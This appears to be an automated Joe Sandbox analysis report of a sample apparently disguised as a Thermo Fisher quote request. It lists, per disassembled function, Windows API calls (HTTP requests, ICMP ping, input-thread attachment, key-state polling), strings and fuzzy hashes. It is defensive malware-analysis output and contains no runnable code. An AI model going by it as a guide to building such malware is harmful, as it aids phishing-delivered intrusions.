                                                              • Opcode Fuzzy Hash: 98f4c4f1aebb4ed0099737baeaa30ac0b67d40ccdf1bc5e76c188340001f17e7
                                                              • Instruction Fuzzy Hash: D961AF70208311AFD714EF94C845BABBBEAAF48715F00460DF9859B292C770ED49CBA7
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00658168
                                                              • inet_addr.WSOCK32(?,?,?), ref: 006581AD
                                                              • gethostbyname.WSOCK32(?), ref: 006581B9
                                                              • IcmpCreateFile.IPHLPAPI ref: 006581C7
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00658237
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0065824D
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006582C2
                                                              • WSACleanup.WSOCK32 ref: 006582C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: b308c152a3f885e3fb8845a8c0a5e4469694bc7e950b500a117c1e5ea1bf25aa
                                                              • Instruction ID: d108e36497c80ab9c417c220d823f6f91f5097cc9da2b119c17ff47e314db0f2
                                                              • Opcode Fuzzy Hash: b308c152a3f885e3fb8845a8c0a5e4469694bc7e950b500a117c1e5ea1bf25aa
                                                              • Instruction Fuzzy Hash: 9751D231600701AFD760AF24CC45B6ABBE6AF48321F048919FE95E73E1DB70E945CB85
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064E396
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0064E40C
                                                              • GetLastError.KERNEL32 ref: 0064E416
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0064E483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 84ed50f303b19f9f32b1bd2d7ff0eb9e1566aab019f37fb154c8d3576565fe34
                                                              • Instruction ID: 873b36fb6c96247420170136c12b6810e14a771a0ce04199dcb3880d0244358d
                                                              • Opcode Fuzzy Hash: 84ed50f303b19f9f32b1bd2d7ff0eb9e1566aab019f37fb154c8d3576565fe34
                                                              • Instruction Fuzzy Hash: 2F318035A40209ABDB05EFA8C985AFEBBF6FF14300F14815AE505E73D1DB719A42CB51
                                                              APIs
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0063B98C
                                                              • GetDlgCtrlID.USER32 ref: 0063B997
                                                              • GetParent.USER32 ref: 0063B9B3
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0063B9B6
                                                              • GetDlgCtrlID.USER32(?), ref: 0063B9BF
                                                              • GetParent.USER32(?), ref: 0063B9DB
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0063B9DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: 1689e5c6b697ac011dcd39df43afe4475c8fc66fad44d7a5e3d5dc2f8349c317
                                                              • Instruction ID: fa297c77e7f296a4616413030ca39d63d94bdc69013c9fd418fc7783fd351334
                                                              • Opcode Fuzzy Hash: 1689e5c6b697ac011dcd39df43afe4475c8fc66fad44d7a5e3d5dc2f8349c317
                                                              • Instruction Fuzzy Hash: C321F5B4900108BFCB04ABA4DC96EFEBBB6EF4A310F101219F651932E2DB745855DB74
                                                              APIs
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0063BA73
                                                              • GetDlgCtrlID.USER32 ref: 0063BA7E
                                                              • GetParent.USER32 ref: 0063BA9A
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0063BA9D
                                                              • GetDlgCtrlID.USER32(?), ref: 0063BAA6
                                                              • GetParent.USER32(?), ref: 0063BAC2
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0063BAC5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1383977212-1403004172
                                                              • Opcode ID: d92b271435e933c5454d96b83824c25ccd18d9c79bf0c5539ba9200ac377e52a
                                                              • Instruction ID: c4568009f8d6d61f3f394075622168472d9f96b88f3d8855cdde075e56915feb
                                                              • Opcode Fuzzy Hash: d92b271435e933c5454d96b83824c25ccd18d9c79bf0c5539ba9200ac377e52a
                                                              • Instruction Fuzzy Hash: 8621F5B4A40108BFDB04AB64DC85EFEB7B6EF44300F000219FA51932D1EB7548559B64
                                                              APIs
                                                              • GetParent.USER32 ref: 0063BAE3
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 0063BAF8
                                                              • _wcscmp.LIBCMT ref: 0063BB0A
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0063BB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: b7791c1f9b36fbd4dd0e2b4208ba826b081c7c4732490ba1b1694b2d29fd533e
                                                              • Instruction ID: b2b13dfb569833a8bb8534af9bab563ddcf05f37bb4d89850132bc0ad71e37d5
                                                              • Opcode Fuzzy Hash: b7791c1f9b36fbd4dd0e2b4208ba826b081c7c4732490ba1b1694b2d29fd533e
                                                              • Instruction Fuzzy Hash: 77112C76648307FAFA206630EC17DE6B79F9F21720F201115FF15E40D6FFA1589146A8
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0065B2D5
                                                              • CoInitialize.OLE32(00000000), ref: 0065B302
                                                              • CoUninitialize.OLE32 ref: 0065B30C
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0065B40C
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0065B539
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0065B56D
                                                              • CoGetObject.OLE32(?,00000000,0068D91C,?), ref: 0065B590
                                                              • SetErrorMode.KERNEL32(00000000), ref: 0065B5A3
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0065B623
                                                              • VariantClear.OLEAUT32(0068D91C), ref: 0065B633
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: b505170ec700af246e118f6e1e6df01578cb520a11992917fa24436b67042e2d
                                                              • Instruction ID: 22a2652a2d0ee9906bcde40b4222d6af3157267faa9e83d8eb8cfbe993429961
                                                              • Opcode Fuzzy Hash: b505170ec700af246e118f6e1e6df01578cb520a11992917fa24436b67042e2d
                                                              • Instruction Fuzzy Hash: 10C124B1608305AFC704DF64C88496BB7EAFF88305F045A5DF98A9B251DB71ED09CB62
                                                              APIs
                                                              • __lock.LIBCMT ref: 0062ACC1
                                                                • Part of subcall function 00627CF4: __mtinitlocknum.LIBCMT ref: 00627D06
                                                                • Part of subcall function 00627CF4: EnterCriticalSection.KERNEL32(00000000,?,00627ADD,0000000D), ref: 00627D1F
                                                              • __calloc_crt.LIBCMT ref: 0062ACD2
                                                                • Part of subcall function 00626986: __calloc_impl.LIBCMT ref: 00626995
                                                                • Part of subcall function 00626986: Sleep.KERNEL32(00000000,000003BC,0061F507,?,0000000E), ref: 006269AC
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0062ACED
                                                              • GetStartupInfoW.KERNEL32(?,006B6E28,00000064,00625E91,006B6C70,00000014), ref: 0062AD46
                                                              • __calloc_crt.LIBCMT ref: 0062AD91
                                                              • GetFileType.KERNEL32(00000001), ref: 0062ADD8
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0062AE11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1426640281-0
                                                              • Opcode ID: 11adea62a05cb4e81fa207e4b4c731f43cf83545b8800df0a6f0d1f00109f099
                                                              • Instruction ID: 99a2d927c623faaaa4a8999a84038c93357f63b30ea9051d409d57b2070c0031
                                                              • Opcode Fuzzy Hash: 11adea62a05cb4e81fa207e4b4c731f43cf83545b8800df0a6f0d1f00109f099
                                                              • Instruction Fuzzy Hash: 2881F370905B618FDB14CFA8E8405ADBBF2AF05320B24535DE4A6AB3D1C7789803DF56
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00644047
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006430A5,?,00000001), ref: 0064405B
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00644062
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 00644071
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00644083
                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 0064409C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006430A5,?,00000001), ref: 006440AE
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 006440F3
                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 00644108
                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006430A5,?,00000001), ref: 00644113
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: a6f8464770dafcc2db912d2a8b358402ef33d3bfe3662c69ff67657f7256df5b
                                                              • Instruction ID: 46c1696aa2183e2df4e2e1304062988b7730dc3dbb861f45c31af4e9597aaf8f
                                                              • Opcode Fuzzy Hash: a6f8464770dafcc2db912d2a8b358402ef33d3bfe3662c69ff67657f7256df5b
                                                              • Instruction Fuzzy Hash: 6E314D71500214BBDB20EB54DC8BFBD7BABAB68751F10D115F905E7390DBB49A808BA4
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0061B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0061B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0061B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0061B4BD
                                                              • GetClientRect.USER32(?), ref: 0067DD63
                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0067DD7A
                                                              • GetWindowDC.USER32(?), ref: 0067DD86
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0067DD95
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067DDA7
                                                              • GetSysColor.USER32(00000005), ref: 0067DDC5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                              • String ID:
                                                              • API String ID: 3430376129-0
                                                              • Opcode ID: b8feb626c6475b2fd46a7375690fd7ca0d45772d8934b877787f6b5b73562f74
                                                              • Instruction ID: 5e5d0ae4e838018077906b256073189f897ed773cbbe9489d08ae193bc94e44a
                                                              • Opcode Fuzzy Hash: b8feb626c6475b2fd46a7375690fd7ca0d45772d8934b877787f6b5b73562f74
                                                              • Instruction Fuzzy Hash: 36114931500205FFDB216BA4EC08FE97BB3EF05325F149725FA6A951E2DB310981EB21
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006030DC
                                                              • CoUninitialize.OLE32(?,00000000), ref: 00603181
                                                              • UnregisterHotKey.USER32(?), ref: 006032A9
                                                              • DestroyWindow.USER32(?), ref: 00675079
                                                              • FreeLibrary.KERNEL32(?), ref: 006750F8
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00675125
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: b179a17be18000923ed9b5a74526ef39f8d557517ebe452d13a9d6ed30eeb316
                                                              • Instruction ID: ad71a55018a3f9000af8282aeb12964c10bcff2d01da67e4faf4b26535140503
                                                              • Opcode Fuzzy Hash: b179a17be18000923ed9b5a74526ef39f8d557517ebe452d13a9d6ed30eeb316
                                                              • Instruction Fuzzy Hash: 45914F706401129FC759EF14C895AAAF3AAFF04305F5482EDE50A673A2DF30AE56CF58
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0061CC15
                                                                • Part of subcall function 0061CCCD: GetClientRect.USER32(?,?), ref: 0061CCF6
                                                                • Part of subcall function 0061CCCD: GetWindowRect.USER32(?,?), ref: 0061CD37
                                                                • Part of subcall function 0061CCCD: ScreenToClient.USER32(?,?), ref: 0061CD5F
                                                              • GetDC.USER32 ref: 0067D137
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0067D14A
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0067D158
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0067D16D
                                                              • ReleaseDC.USER32(?,00000000), ref: 0067D175
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0067D200
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 04d34add9f4325bc4bfcfaec889e892b409c2400805c5e2ca08f31d0b57b6bd6
                                                              • Instruction ID: 971bcadabc8eafc974b060328f488700284609d05b59dbbf066ccc17430cf387
                                                              • Opcode Fuzzy Hash: 04d34add9f4325bc4bfcfaec889e892b409c2400805c5e2ca08f31d0b57b6bd6
                                                              • Instruction Fuzzy Hash: DA71E530400205DFCF21DF64C885AE97BB7FF49324F189A69ED599A2A6C7318C81DF60
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                                • Part of subcall function 0061B63C: GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                                • Part of subcall function 0061B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0066ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 0066ED42
                                                              • ReleaseCapture.USER32 ref: 0066ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0066EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0066EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0066EEDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: 8b7e164bffd10344c33027803569e77bb7107c173dd7fa39ebe503e01522a729
                                                              • Instruction ID: c3f9871477fe1793460dd1cb6ec4366bd8b701b0008c8679825b77f0e11cc4f4
                                                              • Opcode Fuzzy Hash: 8b7e164bffd10344c33027803569e77bb7107c173dd7fa39ebe503e01522a729
                                                              • Instruction Fuzzy Hash: CD51CB74204300AFD704EF20CC9AFAA77E6FB89714F004A1DF5959B2E2DB719954CB52
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006545FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0065462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0065466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00654682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0065468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006546BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00654706
                                                                • Part of subcall function 00655052: GetLastError.KERNEL32(?,?,006543CC,00000000,00000000,00000001), ref: 00655067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: a0e92849d163ac3d411749217dfe5fef47242275bec597a7f6ecfd91370513a8
                                                              • Instruction ID: ebe92a96d449a65d86dbca56e186433df8c0c2441192817318f7f49b5ecd0e31
                                                              • Opcode Fuzzy Hash: a0e92849d163ac3d411749217dfe5fef47242275bec597a7f6ecfd91370513a8
                                                              • Instruction Fuzzy Hash: B54171B1501205BFEB019F50CC89FFB77AEFF09359F00415AFE059A185DB7099898BA4
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0069DC00), ref: 0065B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0069DC00), ref: 0065B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0065B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 0065B8EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
